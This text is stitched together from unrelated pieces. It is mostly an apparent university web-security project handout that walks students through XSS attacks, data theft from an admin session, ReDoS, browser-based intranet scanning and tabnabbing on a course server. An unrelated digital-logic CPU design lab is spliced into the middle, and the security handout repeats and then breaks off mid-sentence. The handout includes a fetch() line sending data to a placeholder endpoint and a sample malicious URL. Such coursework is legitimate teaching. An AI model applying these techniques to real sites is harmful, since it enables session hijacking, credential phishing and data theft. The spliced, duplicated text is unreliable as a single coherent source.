payload and let the payload live in this web app forever. As long as a user clicks on the link you send once, she is infected persistently unless the payload is cleared. After learning some types of XSS, you may think how I can make my attack as persistent as possible on the client’s side if the website doesn’t have a Stored-XSS vulnerability exposed to regular users. As Web technology evolves, more and more applications start to focus on user experience. More and more web applications, including cross platform Electron applications, are taking over desktop applications. Some user’s non-sensitive data is now stored on the client-side, especially the look and feel preferences of an application, to let the App load faster by remembering the user’s preferences without passing back small data chunks. (You can learn more how prevalent this unsafe design is nowadays by reading the paper Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild) Then, the variable is read by an unsafe sink, e.g. eval, element.innerHTML(data). Inspect what is stored locally for the web application, cs6262.gtisc.gatech.edu, and how it is used. Tools you may need: Now, modify the payload in the link from task 2 and fill the updated URL in the questionnaire. The autograder will first visit your URL (NO alert should pop up at this point). Then, it would close the page and reopen to trigger your payload to run (One alert should pop up). Next, it refreshes the page without retriggering your payload (Another alert should pop up). Again, it should detect the alert twice. It should not pop up an alert by only visiting your URL. (Namely, the alert should be triggered when the victim visits any page on this website after reopening.) Deliverables The website, https://cs6262.gtisc.gatech.edu, allows users to create articles. As a user, one needs to submit the post to a moderator who is the admin of the website for approval. This might be an interesting point to investigate whether you can inject something so when the admin is reviewing your post, thereby you can hijack the admin’s login session. This website uses a rich text editor which not only enables styled content but sanitizes the user’s input while preserving its style. In this task, you will submit a post with an injected payload that launches XSS attached to an admin user. Then, you need to steal some information that is only visible to an admin. Stored XSS is an attack where a website does not store data in a safe manner. An attacker could then store malicious code within the website’s database. Said code could be executed whenever a user visits that website. So, a post for an admin’s approval seems like something you will be interested in. If you can steal the admin’s login session cookie, you can login as her to see what she can see. Recall from the lecture that when a cookie has httpOnly, it is not exposed to the document object. This cookie cannot be accessed by JavaScript. What would you need to do to read information out as the cookie’s owner? This httpOnly flag is a good way to prevent JavaScript from reading sensitive cookies. However, it doesn’t mean it can mitigate XSS attacks. Attackers, having malicious scripts running in the victim’s browser, are still able to send requests and forward the responses to themselves. Even though the website is protected by CSRF tokens, attackers can still manage to post malicious payload pretending to be the user. “fetch(‘https://your_endpoint_address/’, {method: ‘post’, body: ‘hi’})” will help you verify the correctness. Then, you should be able to see this after opening your endpoint in a new tab. In this way, you should be able to read data out of the website and send it to your HTTP endpoint. If you are not familiar with the basics of HTTP and JavaScript, learning how to use fetch in an async chain can be helpful. You may read the examples in this documentation:https://developer.mozilla.org/en-US/docs/Web/API/fetch Also, before posting your write-up, please switch back to the “normal” mode to ensure it works. Logging in as an admin is difficult since the website is well-configured to prevent it from happening, even if you have the cookie. An easier way is to “see” the admin’s console page (via your exploit script) and locate the “Information Theft” input box. Looking into the HTML of the page, you will know how you can instruct the admin (again, using your exploit script) to help you to get the hash. The autograder checks your script. Please make sure you have submitted it correctly. Also, please make sure your submission strictly follows the format guideline. A possible reason is that some residual malicious code/scripts are still left on the website, e.g., your local storage or endpoint/inbox. Please clean all the cache and local storage of the website and clean your endpoint/inbox. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. You just have learned how to exploit XSS in various ways. In this task, you will learn what XSS is capable of. You’ve learned from the DoS lecture that GitHub was attacked in March 2015. Those flooding requests came from browsers! Application layer DoS attacks are difficult to stop because a request sent by a bot is the same as a request from a legitimate user. Common mitigation against request flooding is applying challenges like reCaptcha. What if we can still exhaust the server’s resources without flooding requests? A throttle to frequent requests won’t be able to stop it! Regular Expression Denial of Service (ReDoS) is one type of application layer, DoS. Due to the nature of single-threaded JavaScript and its event-loop architecture, if an event takes a long time to execute, the JavaScript thread will not be able to process other normal events. Imagine what if it takes 5 seconds to check a single regular expression. It impacts other users’ experiences severely since the web server is so busy processing the single regular expressions which result in a denial of service to other users. Here are some references: https://www.cloudflare.com/learning/ddos/application-layer-ddos-attack/ https://en.wikipedia.org/wiki/ReDoShttps://sec.okta.com/articles/2020/04/attacking-evil-regex-understanding-regular-expression-denialserviceFreezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers Read the references above to understand what ReDoS is and its impact. In this task, you will try one kind of ReDoS attack. You will find the ReDoS section on the console page. Try to compose a username and password combination to launch a ReDoS attack against the ReDoS server. When an attack is successful, a hash value will be available for you to submit. The username can be a regular expression.Read the materials above, and you will find the solution. Network work scanning has been well studied. You have practiced Nmap in Project 1. In order to scan the intranet using Nmap, you need access to a host in the intranet, which is quite difficult in general. However, by leveraging a user’s browser running on a host inside the intranet, you are still able to scan the intranet by injecting malicious scripts. There are some interesting materials related to intranet scanning using a browser. These vulnerabilities were mitigated since they were disclosed. However, given the common incorrect “Access-Control-Allow-Origin” setup in an intranet network, you may be lucky to sniff something from your target’s local network. As we learned from the lectures, a DNS rebinding attack allows an attacker to bypass SOP, thereby the attacker can read content from intranet web servers. But before launching a DNS rebinding attack, one must know what web servers are available in that organization. A local webserver scanning can help the attacker determine the targets. Now, assume you, as the attacker, have already learned the local IP address range below. And your goal is to determine what IP addresses are serving web content. (Recall the port number or protocol name for serving web content.) A web server will respond “hello” in plain text. The local host IP range is from 172.16.238.4 to 172.16.238.255, which is what you need to scan. These hosts are not accessible from outside as it’s only accessible to the victims – a user or an admin. Deliverables You will get 15% for all correct IP addresses and 0% for all incorrect. Here are some references to cross-origin vulnerabilities: https://portswigger.net/web-security/cors/access-control-allow-originhttps://www.pivotpointsecurity.com/blog/cross-origin-resource-sharing-security/ These two articles below are related to using WebRTC to scan from a browser because of the mechanism of establishing a peer to peer connection if you are interested. These are past-tense anyways, but you are welcome to think of any new ideas related to this. A Browser Scanner: Collecting Intranet Information https://medium.com/tenable-techblog/using-webrtc-ice-servers-for-port-scanning-in-chromece17b19dd474 Reviewing your answer to Q2.3 in Task 1 may help. Please make sure that it’s the admin who runs your script. This IP is only accessible by the admin. Also, please specify the correct protocol name or port number. (The server serves web content, as mentioned in our write-up.) In this task, you are determined to steal other users’ credentials. As per an online survey, you learn people open 10~20 tabs on average to surf the Internet. Therefore, you think tabnabbing, one of the phishing attacks that lure users into giving up their credentials, could be a good social engineering attack vector. Here are some references about what tabnabbing is. https://owasp.org/www-community/attacks/Reverse_Tabnabbinghttps://en.wikipedia.org/wiki/Tabnabbinghttps://medium.com/@shatabda/security-tabnabbing-what-how-b038a70d300e Given restrictions https://cs6262.gtisc.gatech.edu has and you being able to exploit the XSS vulnerabilities only, you have to implement a variant of tabnabbing following the requirements below. After the simulated user submits her credentials, you will receive a hash string in your Message Receiver Endpoint.If they are changed, the user may not find the tab and see your phishing page.And, the URL in the address bar should NOT change for the opener tab. Vigilant users may also look at the address bar to determine whether the URL is correct. So, it’s better to keep the original URL to get the user’s trust. If your attack changes the webpage after the victim switches back to the attacked tab, the user bot may not be able to fill in the form. Please make sure that the webpage content is changed right after 60 seconds (the victim switched to another tab) and before the victim switches back. When a tab does not have focus, setInterval running inside has a lower resolution. This issue may worsen on user bots when our server runs under pressure. Please be aware of it when you write your script. If the login user to your tabnab page is not the user bot, it will send a wrong hash to your endpoint. Please ensure that it was the user bot who logged in to the tabnab page but not any other users, e.g., you being the victim of your script. Other tips: Do not use window.open for opening a new window (when the victim clicks a link). All submissions will go to GradeScope where an autograder will help you understand the correctness of your solution.The autograder will deduct points for files that are not uploaded. You can upload an empty file if you haven’t gone that far yet, or just ignore the points deducted. Make sure you upload all the files when you are done. Please do not expect TAs to debug your code or provide a walkthrough for the tasks, as you are expected to master the low-level details when you complete this course. Due to our limited bandwidth, we also do not entertain questions answered in our FAQ unless you explain why the FAQ cannot resolve your issues. If you suspect there are issues with our web server or the autograder, please provide details so that we can resolve the issues more efficiently. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. Please make sure that you have correctly set your username in the questionnaire. We strongly advise that you DO NOT rely on any AI chat bots or similar AI platforms to generate a solution. Not only does the AI bot forfeit your chance to learn something, but such solutions do not correctly cite sources and are often too like those of other students who also utilize AI bots. Regardless of your intention, we treat them all as plagiarism if we detect very similar solutions. We have kept improving this project for many years. And so many students successfully finished this project. Most unhappy cases are due to typo mistakes, syntax errors in the submitted solution, or misunderstanding of the attack concept. Unlike typical computer system courses, the environment for this project will be out of your control, and you will drive off-road. So, you cannot assume the victim’s environment is the same as yours. If something does not work as expected, we advise you to inspect your code line-by-line (e.g., putting a log message line-by-line) and review the given materials (e.g., tips, videos, other students’ posts, etc.). We don’t debug your code. Learning the attacker’s mind is one of the goals of the project. Although you don’t have server access for debugging, you can inject a script into the project server. Using log messages in the injected script, you can figure out the server’s status (e.g., where it gets stuck) by transferring the log messages from the server to your endpoint.
The objective of this lab is to continue the design of an elementary central processing unit (CPU) that was started in Lab 4. In part 1 of this lab, a 2-bit instruction field will be used to control a simple state machine that in turn will be used to set the MUX lines in the RALU (registers and ALU) according to what type of instruction is designated for execution. In part 2, a 3-bit instruction field will be used. You will also add a program counter (PC) and a memory module to store the instructions of a “program” to be executed by the CPU. MATERIALS • Your entire 3701 kit including your PLD PCB Wires, Resistor packages, Switches (including your debounced switch circuit), LEDs, DAD o Note that in this lab, you can use the DAD to generate your inputs and to show your outputs (instead of switch and LED circuits); it is your choice! • Document on website: Explanation_of_Table4 from Lab 4 • ROM Creation Tutorial • VHDL ROM Alternative files: o Instructions: VHDL_ROM.pdf o Quartus archive file: Board_ROM.qar o Excel spreadsheet: ROM_contents.xlsx INTRODUCTION – LAB 4 RALU MUX SIGNALS The RALU designed in the second part of Lab 4 (named there as a RALU) consisted of four 4-input MUXs on the inputs of REGA and four 4-input MUXs on the inputs of REGB. The select lines for these MUXs were designated MSA1:0 and MSB1:0, respectively. For a quick review, the MUXs selected a bus as shown in Table 1. MSA1/ MSB1 MSA0/ MSB0 Bus Selected as Input to REGA/REGB 0 0 INPUT Bus 0 1 REGA Bus 1 0 REGB Bus 1 1 OUTPUT Bus Table 1. MUX A and B settings. The outputs of REGA and REGB were then passed to a combinatorial logic block and the results of this were then passed to four 8-input MUXs. The select lines for these four MUXs were designated as MSC2:0. For review purposes, these (3) lines selected the functions shown in Table 2. There is no need to modify your lab 4 RALU design unless it did not work, although adding a reset input will be necessary in Part 2. I will call this the Lab 4* RALU.PART 1 INTRODUCTION: 1st RALU CONTROLLER A state machine controller and Instruction Register (IR) are now added to the Lab 4* RALU to facilitate the execution of simple instructions. See Figure 1 for the total system components of this section. The IR register contains 2 bits that represent the four instructions shown in Table 3. In this part of the lab, you will ultimately use Quartus to make the project LAB6_Part1. MSC2:0 Action 000 REGA Bus to OUTPUT Bus 001 REGB Bus to OUTPUT Bus 010 complement of REGA Bus to OUTPUT Bus 011 bit wise AND REGA/REGB Bus to OUTPUT Bus 100 bit wise OR REGA/REGB Bus to OUTPUT Bus 101 sum of REGA Bus & REGB Bus to OUTPUT Bus 110 shift REGA Bus left one bit to OUTPUT Bus 111 shift REGA Bus right one bit to OUTPUT Bus (logical shift, not arithmetic shift) Table 2. MUX C settings. IR1:0 Action Instruction 00 Move REGA contents => REGB TAB 01 Load INPUT bus => REGA LDAA #In 10 Sum REGA & REGB => REGA SUM_BA 11 Left Shift REGA 1 bit => REGA SLA Table 3. Part 1 instructions. The flowchart (NOT an ASM) for the controller is shown in Figure 2. All instructions execute in one cycle (plus one cycle to load the IR register). I strongly encourage you to use VHDL for the combinatorial part of the controller. Instruction Register Design The IR is clocked like a typical bank of D Flip-Flops, however, it has a new feature; it can be loaded or not loaded depending on “IR.LD”. When IR.LD is true, data is loaded into the register and when IR.LD is false, new data is not loaded into the register (hold condition). This register can be simply realized with a 2-input MUX (in Quartus, if you want a bdf component, try 21mux) on the input of each flip-flops of the IR. When a 2-input MUX select line is false, select an IR output to pass through the MUX back into a D-FF input; when the select line is true, an INPUT bus signal should pass through a MUX and into a D-FF input. PART 1 PRE-LAB REQUIREMENTS 1. Use the flowchart shown in Figure 2 to help you create an ASM chart. The ASM’s outputs include the MUX select signals (instead of the description of actions). 2. Create a next state truth table. If you use the graphic design editor (block diagram/schematic file) for schematic entry in Quartus to create your controller, you must make K-maps and simplified logic equations for the controller. If you use VHDL (and external flip-flops) to create the controller, you do not need to make K-maps or simplify the equations. 3. Using the block diagram/schematic editor in Quartus, add the IR and controller circuitry to your Lab 4* RALU. 4. Simulate and test all instructions created in the controller circuitry. As always, annotate your design simulation. 5. Turn in all the documents described above as stated in the Lab Rules and Policies document; re-read, if necessary. (Submit the Quartus archive file LAB6_Part1.qar). Documents must be submitted through Canvas for every lab. All pre-lab material is to be submitted as required (at least 15 minutes before the beginning of your lab). PART 1 PRE-LAB QUESTIONS 1. Why did we require the new instruction register in this design? 2. In this section of the lab you are setting the INPUT bus by hand. If you wanted to read or fetch this value from memory, what could you add to do this automatically for you every CLK cycle? 3. How would you add more instructions (i.e., 8 instead of 4) to the controller? PART 1 IN-LAB REQUIREMENTS None. You do not need to build the circuit of part 1. HELPFUL HINTSDebug as you design for a much better chance of success. When something goes wrong, i.e., when a design does not work as expected, don’t panic! Think of some experiments that you can do to break the problem down into pieces in order to isolate the error. A useful tool for debugging a design is to add outputs for some of the internal signals, i.e., signals that are neither outputs nor inputs of your design. This will allow you to “peer inside” a design both in simulation and with the actual hardware. PART 2 INTRODUCTION: 2nd RALU CONTROLLER The main difference between parts 1 and 2 of the lab is in the way the inputs are generated. In part 1, you input the op codes (i.e., 00, 01, 10, or 11) and data manually. The op codes and inputs were entered between every active clock transition with the switches at INPUT3:0. In this section (part 2), the op code and data will be stored in memory. Your controller will control the signals in such a manner that the op code and data are automatically fetched from memory; the outputs of this memory are inputs INPUT3:0. A program counter (PC) will coordinate the sequencing of the instruction by stepping through the addresses in an appropriate manner. In this part of the lab, you will ultimately use Quartus to make the project LAB6_Part2 and then LAB6_Part2_VHDL_ROM). SPECIFICATIONS No changes will be made to MUXA, MUXB, MUXC, REGA or REGB from the Lab 4* RALU. 1. As shown in Figure 3, a 32k × 8 EEPROM (or Flash) is added. The instructions and data will be stored in this EEPROM starting in location $6B70. (See Part 2 PreLab Question 2.) 2. A program counter (PC) is added. PC is a 4-bit upcounter with a synchronous count enable signal (PC_INC). If PC_INC is TRUE, the counter will increment by 1 at the next active clock transition. If PC_INC is FALSE, the counter holds its current value. The count after 11112 is 00002. Another synchronous signal, PC_LD, is used to load the counter from the INPUT bus. The 74’161 (with asynchronous clear) is ideally suited to function as a 4-bit PC. (The 74’163 is identical except that it has a synchronous clear.) 3. The instruction register from part 1 of this lab is increased to 3 bits (IR2:0), as shown in Table 4. IR2:0 Instruction Function 000 LDAA #data Load A with input data 001 TAB Copy A to B (transfer A to B) 010 JMP Addr Load PC with input address 011 SAL Shift A left 1 bit, store in A 100 SAR Shift A right 1 bit, store in A (logical, not arithmetic shift) 101 ABA Load A with A plus B plus Cin; update Cout 110 Future use 111 Future use Table 4. Part 2 instructions. Changes to the ASM chart: 1. All the manual switching that you would need to do if part 1 of this lab was built (e.g., setting the INPUT = next op code or data) can be better accomplished by incrementing the address on the ROM. The ROM will have the information that (in part 1 of this lab) would have come from switches (or your DAD). This is accomplished by incrementing the PC register or “Inc PC,” as shown in the Figure 4 flowchart. 2. Notice that an additional state is necessary for the LDAA instruction in order to read the memory a second time to obtain the data to place in register A. 3. The instruction SUM_BA from part 1 is now spelled ABA (which stands for add A to B and put the result into A). 4. Note that the right shift is a logical shift, NOT an arithmetic shift, i.e., a zero is shifted into the most significant bit of REGA with the SAR instruction. Shift register A right (SRA) from part 1 is spelled differently here, now as SAR. 5. The first new instruction is called “JMP Addr”. JMP Addr consists of two nibbles where the first is the opcode and the second is an address. This instruction forces the PC to load a 4-bit address read from memory (2nd nibble). 6. The other new instruction is a shift register A left (SAL). A zero should be shifted into the right most bit with this shift. MIF FILE CREATION INFORMATION When you write code in pre-lab part 4, below, you will hand assemble your code and put it into the “rom_32k.mif” file. A sample mif file (rom_8k.mif) can be found on the website and another mif file, rom_1k.mif, in the tutorial. These files can be used as templates to generate your own file. Key points related to these files are: 1. The comments are surrounded by “%”symbols. The left most number represents address space followed by the hex value to the right. For example: “memory address” :”memory value” %comment% 2. The last line of code in the “rom_32k.mif,” file (after your program) should zero out the remaining data in ROM. In the rom_8k.mif file, the end of memory was filled with $FF using the line below: [8A..1FFF] : 00; Your last line will be [XX..7FFF] : 0; In the above, XX represents the next address after the last address of your code. This will initialize all your remaining unused memory to a known value of zero. PRE-LAB REQUIREMENTS 1. Create an ASM chart using the Figure 4 flowchart as an aid; i.e., put in the actual signals to control the PC, IR, and the MUXs. Complete the ASM diagram, by also including the required elements for the SAR and SAL instructions. 2. Create a next state truth table. If you use the block diagram/schematic editor in Quartus to create your controller, you must make K-maps and use simplified logic equations for the controller. If you use VHDL (and external flip-flops) to create the controller, you do not need to make K-maps or simplify the equations. 3. Add an active-low asynchronous RESET signal to all registers and the counter. You should use this to initialize all flip-flops (and the 4-bit counter) to zero before beginning your testing. (You should design every state machine so that you can start it in a known state. For this lab, the known state has state bits of all zeros.) 4. Hand assemble the below program and complete the table, adding the address on the left and the machine codes (the values that will be stored in the ROM). Add the required info in the successive columns of A and B are for the changing values of RegA and RegB as the program is executed and the loop (created by the JMP instruction) causes the code to repeat.Addr Mach Codes A B A B A B A B $6B70 LDAA #$5 TAB LDAA #$9 ABA SAR TAB SAL JMP 5 LDAA #$D ABAYou can separately simulate the flash memory portion of your design in Quartus, just as you can separately test the controller, PC, and you already tested the Lab4 RALU design. Read through the documentation in the ROM Creation Tutorial, available on our website. Also see the below section on MIF file creation.Implement the design in Quartus (LAB6_Part2) and simulate the execution of this program. Use the ROM Creation Tutorial to create the ROM: 1-PORT. You should start your simulation with a reset.You must make a MIF file for this program. If you did not simulate a ROM, you would need to input the op codes and data in the *.vwf simulation waveform file (just as you did in Lab 4), which is much harder than making the ROM and MIF file. You cannot compile an entire 32k × 8 EEPROM with any devices in MAX X family, but you can compile and simulate a 32k x 8 EEPROM if you select the Cyclone V family and the device at the bottom of the list in Quartus in the Assignments | Device menu. Use a functional compilation and simulation. As always, annotate your design simulation. Outputs should include the state bits, the registers, INPUT3:0, OUT3:0, IR.LD, IR, PC, PC_LD, and PC_INC. During debugging, you should also add the MUX select lines.Note that the memory clock should be at least twice as fast as the state machine clock in order to assure that the ROM data is available at the proper time. (See the ROM Creation Tutorial for more information.)The simulation technique used above will be used again in Lab 7.Although there is a flash ROM on your OOTB PLD PCB, we will instead use the VHDL ROM alternative procedure described on the website and put the entire design in Quartus (LAB6_Part2_VHDL_ROM). In addition to the one done in part 4, above, you must also do a second simulation with the VHDL ROM alternative.6. Appropriately connect the PLD PCB, LEDs, and switches (and/or DAD) on your bread board; verify that it functions as specified in the Pre-Lab Requirements. You will need a debounced switch (or proper DAD signal) for the CLK input. 7. Run the program.Pre-lab Simulation and Programming Summary: • Create a 32k × 8 ROM with the program’s machine codes, using a Cyclone V device. o Create a MIF file with these machine codes. o Simulate this design (LAB6_Part2). • Use the VHDL ROM alternative for the ROM with your MAX 10. Simulate this design (LAB6_Part2_VHDL_ROM). o Program this design to your MAX 10 PLD PART 2 PRE-LAB QUESTION 1. Why do we need the extra states in the LDAA and JMP instruction paths? 2. What do you need to do to the address lines to get your program to start at address $2C50 (instead of $6B70)? PART 2 IN-LAB REQUIREMENTS 1. Demo the program (step 7 in the Part 2 Pre-lab Requirements). 2. Write a new program (given to you by your PI); handle assemble the program; insert the new program’s machine codes into the VHDL ROM alternative; compile and then run the program. Demo this new program.
You can find the due date and how to turn in your solution located on the Canvas assignment page and Ed discussion. You’ve been invited to the CS6262 security club; welcome! The security club has a new official website we use for sharing information and resources. Unfortunately, the last administrator was too busy and didn’t perform any security audits on the website. Oh no!The club’s security team wants you, the club’s newest member, to deliver a full security audit of our new official website. You’ve been tasked to provide a pen-testing report to the club’s security team. You’ve received this message to start you off:“Hi there! The club’s website can be found at https://cs6262.gtisc.gatech.edu. We’ve integrated the GT Single-Sign-On service, so please sign in with your GT account and it will create a user for you. The website is not complicated. It is a simple Content Management System (CMS) with several features enabled, e.g., text search, dark mode, rich text editor, etc. Good luck auditing! The CS6262 Security Team” Let’s first orient ourselves on the website. The project website is located at cs6262.gtisc.gatech.edu – type this into your browser. We recommend using the latest version of Google Chrome. To trigger an XSS attack on the admin side, fill in the URL of your post and submit to the admin role. It will create or override the current running browser instance, which means when it’s messed up, you can submit a URL to override the current one. To trigger an XSS attack on other users’ sides, fill in the URL of your malicious payload. The user instances also override the current one when you submit new URLs. The admin instance will be used for task 4 and task 5.2. The user instance will be used for task 5.3. iii. Check “Restart the ReDoS instance” to launch the ReDoS server again when you feel like the server is not responding to your submission. Here are the two approaches. Note: Fill up the questionnaire and submit required files onto GradeScope. Modern browsers will provide DevTools for front-end developers to debug and tune the performance when developing a website. Attackers can also use these tools to explore and collect information. Open your Chrome and press F12 to open the developer console. DevTools will popup. Here you can run JavaScript in the console, view the source html of the webpage, capture the network traffic, and other functionalities. Try to explore it by yourself. 1.2 console.log() console.log() is commonly used to print information into the console of the developer tools for debugging purposes. Open the devTool and type console.log(“yourGTID”); You can see your GTID is printed in the console. 1.3 setInterval setInterval is used to fire a function given a frequency. It will return an intervalID which can be passed to clearInterval to cancel the interval. Question: Given a variable var counter = 5, make use of setInterval and clearInterval to reduce thecounter to 0 in every second and then stop. You can run your code in devTools to verify. var counter = 5;// Your code below 1.4 setTimeout setTimeout will fire a function after the delay milliseconds. The function will only be fired once. Similarly you can use the returned timeoutID and clearTimeout to cancel the timeout. Question: Given a variable var counter = 5, make use of setTimeout to reduce the counter to 0 in every second and then stop. You can run your code in devTools to verify.var counter = 5;// Your code below 1.5 Promise A Promise is an object used for async operations in JavaScript. There are three states in a Promise object: Pending, Fulfilled, and Rejected. Once created, the state of the Promise object is pending. So the calling function will not be blocked and continue executing. The Promise object will eventually be fulfilled or rejected. Then the respective resolve or reject function will be called. Below is an example of a Promise. Before running the code, can you tell what the output would be? Can you explain why? Which of the following options can adjust iframe’s width and height correctly? FAQ Please make sure that you have correctly set your username in the questionnaire. Find where to exploit a reflected XSS and fill in the questionnaire URL by visiting which an alert should trigger. Reflective XSS is an attack where a website does not return requested data in a safe manner.Reflective is generally an XSS attack where the attacker sends the victim a link to a reputable website. BUT, this link contains malicious javascript code. For example, https://www.facebook.com/login?username=username&password=passwordsteal-yourinformation.jsIf the website returns the data in an unsafe manner (does not sanitize the output) and the victim clicks on this link, then the malicious code will be executed in the context of the victim’s session. The content of the alert doesn’t matter. For example, https://cs6262.gtisc.gatech.edu/endpoint…yourpayload is what you need to fill in the questionnaire. The autograder will visit your URL. If it detects an alert, then you will receive full credit. After finding the exploitable place from task 2, you understand you can infect others by sending them links. But sending links is costly and people may not click on them every time. Therefore, instead of sending a link required in task 2, you find you can actually modify the payload and let the payload live in this web app forever. As long as a user clicks on the link you send once, she is infected persistently unless the payload is cleared. After learning some types of XSS, you may think how I can make my attack as persistent as possible on the client’s side if the website doesn’t have a Stored-XSS vulnerability exposed to regular users. As Web technology evolves, more and more applications start to focus on user experience. More and more web applications, including cross platform Electron applications, are taking over desktop applications. Some user’s non-sensitive data is now stored on the client-side, especially the look and feel preferences of an application, to let the App load faster by remembering the user’s preferences without passing back small data chunks. (You can learn more how prevalent this unsafe design is nowadays by reading the paper Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild) Then, the variable is read by an unsafe sink, e.g. eval, element.innerHTML(data). Inspect what is stored locally for the web application, cs6262.gtisc.gatech.edu, and how it is used. Tools you may need: Now, modify the payload in the link from task 2 and fill the updated URL in the questionnaire. The autograder will first visit your URL (NO alert should pop up at this point). Then, it would close the page and reopen to trigger your payload to run (One alert should pop up). Next, it refreshes the page without retriggering your payload (Another alert should pop up). Again, it should detect the alert twice. It should not pop up an alert by only visiting your URL. (Namely, the alert should be triggered when the victim visits any page on this website after reopening.) Deliverables The website, https://cs6262.gtisc.gatech.edu, allows users to create articles. As a user, one needs to submit the post to a moderator who is the admin of the website for approval. This might be an interesting point to investigate whether you can inject something so when the admin is reviewing your post, thereby you can hijack the admin’s login session. This website uses a rich text editor which not only enables styled content but sanitizes the user’s input while preserving its style. In this task, you will submit a post with an injected payload that launches XSS attached to an admin user. Then, you need to steal some information that is only visible to an admin. Stored XSS is an attack where a website does not store data in a safe manner. An attacker could then store malicious code within the website’s database. Said code could be executed whenever a user visits that website. So, a post for an admin’s approval seems like something you will be interested in. If you can steal the admin’s login session cookie, you can login as her to see what she can see. Recall from the lecture that when a cookie has httpOnly, it is not exposed to the document object. This cookie cannot be accessed by JavaScript. What would you need to do to read information out as the cookie’s owner? This httpOnly flag is a good way to prevent JavaScript from reading sensitive cookies. However, it doesn’t mean it can mitigate XSS attacks. Attackers, having malicious scripts running in the victim’s browser, are still able to send requests and forward the responses to themselves. Even though the website is protected by CSRF tokens, attackers can still manage to post malicious payload pretending to be the user. “fetch(‘https://your_endpoint_address/’, {method: ‘post’, body: ‘hi’})” will help you verify the correctness. Then, you should be able to see this after opening your endpoint in a new tab. In this way, you should be able to read data out of the website and send it to your HTTP endpoint. If you are not familiar with the basics of HTTP and JavaScript, learning how to use fetch in an async chain can be helpful. You may read the examples in this documentation:https://developer.mozilla.org/en-US/docs/Web/API/fetch Also, before posting your write-up, please switch back to the “normal” mode to ensure it works. Logging in as an admin is difficult since the website is well-configured to prevent it from happening, even if you have the cookie. An easier way is to “see” the admin’s console page (via your exploit script) and locate the “Information Theft” input box. Looking into the HTML of the page, you will know how you can instruct the admin (again, using your exploit script) to help you to get the hash. The autograder checks your script. Please make sure you have submitted it correctly. Also, please make sure your submission strictly follows the format guideline. A possible reason is that some residual malicious code/scripts are still left on the website, e.g., your local storage or endpoint/inbox. Please clean all the cache and local storage of the website and clean your endpoint/inbox. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. You just have learned how to exploit XSS in various ways. In this task, you will learn what XSS is capable of. You’ve learned from the DoS lecture that GitHub was attacked in March 2015. Those flooding requests came from browsers! Application layer DoS attacks are difficult to stop because a request sent by a bot is the same as a request from a legitimate user. Common mitigation against request flooding is applying challenges like reCaptcha. What if we can still exhaust the server’s resources without flooding requests? A throttle to frequent requests won’t be able to stop it! Regular Expression Denial of Service (ReDoS) is one type of application layer, DoS. Due to the nature of single-threaded JavaScript and its event-loop architecture, if an event takes a long time to execute, the JavaScript thread will not be able to process other normal events. Imagine what if it takes 5 seconds to check a single regular expression. It impacts other users’ experiences severely since the web server is so busy processing the single regular expressions which result in a denial of service to other users. Here are some references: https://www.cloudflare.com/learning/ddos/application-layer-ddos-attack/ https://en.wikipedia.org/wiki/ReDoShttps://sec.okta.com/articles/2020/04/attacking-evil-regex-understanding-regular-expression-denialserviceFreezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers Read the references above to understand what ReDoS is and its impact. In this task, you will try one kind of ReDoS attack. You will find the ReDoS section on the console page. Try to compose a username and password combination to launch a ReDoS attack against the ReDoS server. When an attack is successful, a hash value will be available for you to submit. The username can be a regular expression.Read the materials above, and you will find the solution. Network work scanning has been well studied. You have practiced Nmap in Project 1. In order to scan the intranet using Nmap, you need access to a host in the intranet, which is quite difficult in general. However, by leveraging a user’s browser running on a host inside the intranet, you are still able to scan the intranet by injecting malicious scripts. There are some interesting materials related to intranet scanning using a browser. These vulnerabilities were mitigated since they were disclosed. However, given the common incorrect “Access-Control-Allow-Origin” setup in an intranet network, you may be lucky to sniff something from your target’s local network. As we learned from the lectures, a DNS rebinding attack allows an attacker to bypass SOP, thereby the attacker can read content from intranet web servers. But before launching a DNS rebinding attack, one must know what web servers are available in that organization. A local webserver scanning can help the attacker determine the targets. Now, assume you, as the attacker, have already learned the local IP address range below. And your goal is to determine what IP addresses are serving web content. (Recall the port number or protocol name for serving web content.) A web server will respond “hello” in plain text. The local host IP range is from 172.16.238.4 to 172.16.238.255, which is what you need to scan. These hosts are not accessible from outside as it’s only accessible to the victims – a user or an admin. Deliverables You will get 15% for all correct IP addresses and 0% for all incorrect. Here are some references to cross-origin vulnerabilities: https://portswigger.net/web-security/cors/access-control-allow-originhttps://www.pivotpointsecurity.com/blog/cross-origin-resource-sharing-security/ These two articles below are related to using WebRTC to scan from a browser because of the mechanism of establishing a peer to peer connection if you are interested. These are past-tense anyways, but you are welcome to think of any new ideas related to this. A Browser Scanner: Collecting Intranet Information https://medium.com/tenable-techblog/using-webrtc-ice-servers-for-port-scanning-in-chromece17b19dd474 Reviewing your answer to Q2.3 in Task 1 may help. Please make sure that it’s the admin who runs your script. This IP is only accessible by the admin. Also, please specify the correct protocol name or port number. (The server serves web content, as mentioned in our write-up.) In this task, you are determined to steal other users’ credentials. As per an online survey, you learn people open 10~20 tabs on average to surf the Internet. Therefore, you think tabnabbing, one of the phishing attacks that lure users into giving up their credentials, could be a good social engineering attack vector. Here are some references about what tabnabbing is. https://owasp.org/www-community/attacks/Reverse_Tabnabbinghttps://en.wikipedia.org/wiki/Tabnabbinghttps://medium.com/@shatabda/security-tabnabbing-what-how-b038a70d300e Given restrictions https://cs6262.gtisc.gatech.edu has and you being able to exploit the XSS vulnerabilities only, you have to implement a variant of tabnabbing following the requirements below. After the simulated user submits her credentials, you will receive a hash string in your Message Receiver Endpoint.If they are changed, the user may not find the tab and see your phishing page.And, the URL in the address bar should NOT change for the opener tab. Vigilant users may also look at the address bar to determine whether the URL is correct. So, it’s better to keep the original URL to get the user’s trust. If your attack changes the webpage after the victim switches back to the attacked tab, the user bot may not be able to fill in the form. Please make sure that the webpage content is changed right after 60 seconds (the victim switched to another tab) and before the victim switches back. When a tab does not have focus, setInterval running inside has a lower resolution. This issue may worsen on user bots when our server runs under pressure. Please be aware of it when you write your script. If the login user to your tabnab page is not the user bot, it will send a wrong hash to your endpoint. Please ensure that it was the user bot who logged in to the tabnab page but not any other users, e.g., you being the victim of 